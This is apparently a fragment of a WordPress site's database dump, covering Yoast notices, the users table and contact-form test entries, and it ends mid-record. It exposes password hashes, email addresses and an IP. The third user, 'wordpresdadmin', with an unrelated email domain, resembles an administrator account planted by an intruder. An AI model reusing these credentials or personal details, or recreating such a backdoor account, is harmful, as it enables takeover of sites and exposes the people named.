\";s:7:\"options\";a:9:{s:4:\"type\";s:5:\"error\";s:2:\"id\";s:47:\"wpseo-conflict-d3e7311d20ccd459ef1ade2a522ccfe6\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:2;a:2:{s:7:\"message\";s:445:\"<p>The <em>All In One SEO Pack</em> plugin might cause issues when used in conjunction with Yoast SEO.</p><p>Both Yoast SEO and All In One SEO Pack manage the SEO of your site. Running two SEO plugins at the same time is detrimental.</p><a class=\"button button-primary\" href=\"plugins.php?action=deactivate&amp;plugin=all-in-one-seo-pack%2Fall_in_one_seo_pack.php&amp;plugin_status=all&amp;_wpnonce=e0130862b5\">Deactivate All In One SEO Pack</a> \";s:7:\"options\";a:9:{s:4:\"type\";s:5:\"error\";s:2:\"id\";s:47:\"wpseo-conflict-07b95b67cae87afa4939008dbf832b83\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:3;a:2:{s:7:\"message\";s:840:\"<strong>Upgrade WordPress to the most recent version</strong><br/>Weâ€™ve noticed that youâ€™re not on the latest WordPress version, which might cause an issue soon. Yoast (for reasons of security and stability) only supports the current and previous version of WordPress. When the next version of WordPress comes out, that means that we will support WordPress 5.2 and 5.3. This means you will not get any updates to Yoast SEO until you update your WordPress, so please make sure to upgrade to the latest WordPress version soon!<br/><br/><br/><br/>Read <a href=\"https://yoa.st/old-wp-support?php_version=5.6&platform=wordpress&platform_version=5.1.3&software=free&software_version=12.3&days_active=30plus&user_language=en_US\" target=\"_blank\" rel=\"nofollow\">this post for more information about why weâ€™re not supporting older versions.</a>\";s:7:\"options\";a:9:{s:4:\"type\";s:5:\"error\";s:2:\"id\";s:31:\"wpseo-dismiss-wordpress-upgrade\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(105,1,'wpdp_wpseo-dismiss-wordpress-upgrade','seen');
/*!40000 ALTER TABLE `wpdp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_users`
--

DROP TABLE IF EXISTS `wpdp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `spam` tinyint(2) NOT NULL DEFAULT '0',
  `deleted` tinyint(2) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_users`
--

LOCK TABLES `wpdp_users` WRITE;
/*!40000 ALTER TABLE `wpdp_users` DISABLE KEYS */;
INSERT INTO `wpdp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`, `spam`, `deleted`) VALUES (1,'pentadbirweb','$P$BzLAhyMLsxaBIfM1ZM2q5eNuIVsbMq0','pentadbirweb','faiz@bintara.com.my','','2018-12-11 00:50:30','',0,'pentadbirweb',0,0),(2,'famedemo','$P$BwionnL.Wf4dqws.30wJTp7Rbw9sYN.','famedemo','contact-demo-email@famethemes.com','','2018-12-11 01:23:39','',0,'FameThemes',0,0),(3,'wordpresdadmin','$P$BjAa0O10KdfadD2Q8dF9VFleQ2cboA1','wordpresdadmin','scored@r.balantfromsun.com','','2019-12-12 00:00:00','',0,'',0,0);
/*!40000 ALTER TABLE `wpdp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_visual_form_builder_entries`
--

DROP TABLE IF EXISTS `wpdp_visual_form_builder_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_visual_form_builder_entries` (
  `entries_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `subject` text COLLATE utf8mb4_unicode_ci,
  `sender_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `sender_email` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `emails_to` text COLLATE utf8mb4_unicode_ci,
  `date_submitted` datetime DEFAULT NULL,
  `ip_address` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `entry_approved` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '1',
  PRIMARY KEY (`entries_id`)
) ENGINE=MyISAM AUTO_INCREMENT=372 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_visual_form_builder_entries`
--

LOCK TABLES `wpdp_visual_form_builder_entries` WRITE;
/*!40000 ALTER TABLE `wpdp_visual_form_builder_entries` DISABLE KEYS */;
INSERT INTO `wpdp_visual_form_builder_entries` (`entries_id`, `form_id`, `data`, `subject`, `sender_name`, `sender_email`, `emails_to`, `date_submitted`, `ip_address`, `entry_approved`) VALUES (1,1,'a:8:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"test name\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:4;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test message\";}i:5;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"14\";}i:7;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','faiz@bintara.com.my','a:1:{i:0;s:0:\"\";}','2018-12-11 10:32:13','118.100.67.42','1'),(2,1,'a:8:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:4;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test message\";}i:5;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"54\";}i:7;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','faiz@bintara.com.my','a:1:{i:0;s:0:\"\";}','2018-12-11 10:36:57','118.100.67.42','1'),(3,1,'a:8:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 1\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test company 1\";}i:4;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 1\";}i:5;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"14\";}i:7;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','faiz@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 10:40:10','118.100.67.42','1'),(4,1,'a:8:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 2\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test company 2\";}i:4;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 2\";}i:5;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"14\";}i:7;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 10:42:24','118.100.67.42','1'),(5,1,'a:8:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 3\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:4;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 2\";}i:5;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"54\";}i:7;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 10:47:17','118.100.67.42','1'),(6,1,'a:8:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 4\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:4;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 4\";}i:5;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"98\";}i:7;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','faiz@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 10:51:04','118.100.67.42','1'),(7,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 4\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123456789\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 2\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"54\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 11:03:22','118.100.67.42','1'),(8,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:8:\"fieldset\";s:4:\"name\";s:8:\"Fieldset\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 5\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123456789\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 5\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"90\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-11 11:12:12','118.100.67.42','1'),(9,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"test 4\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"sharifuddin@bintara.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123456789\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"test company\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test message 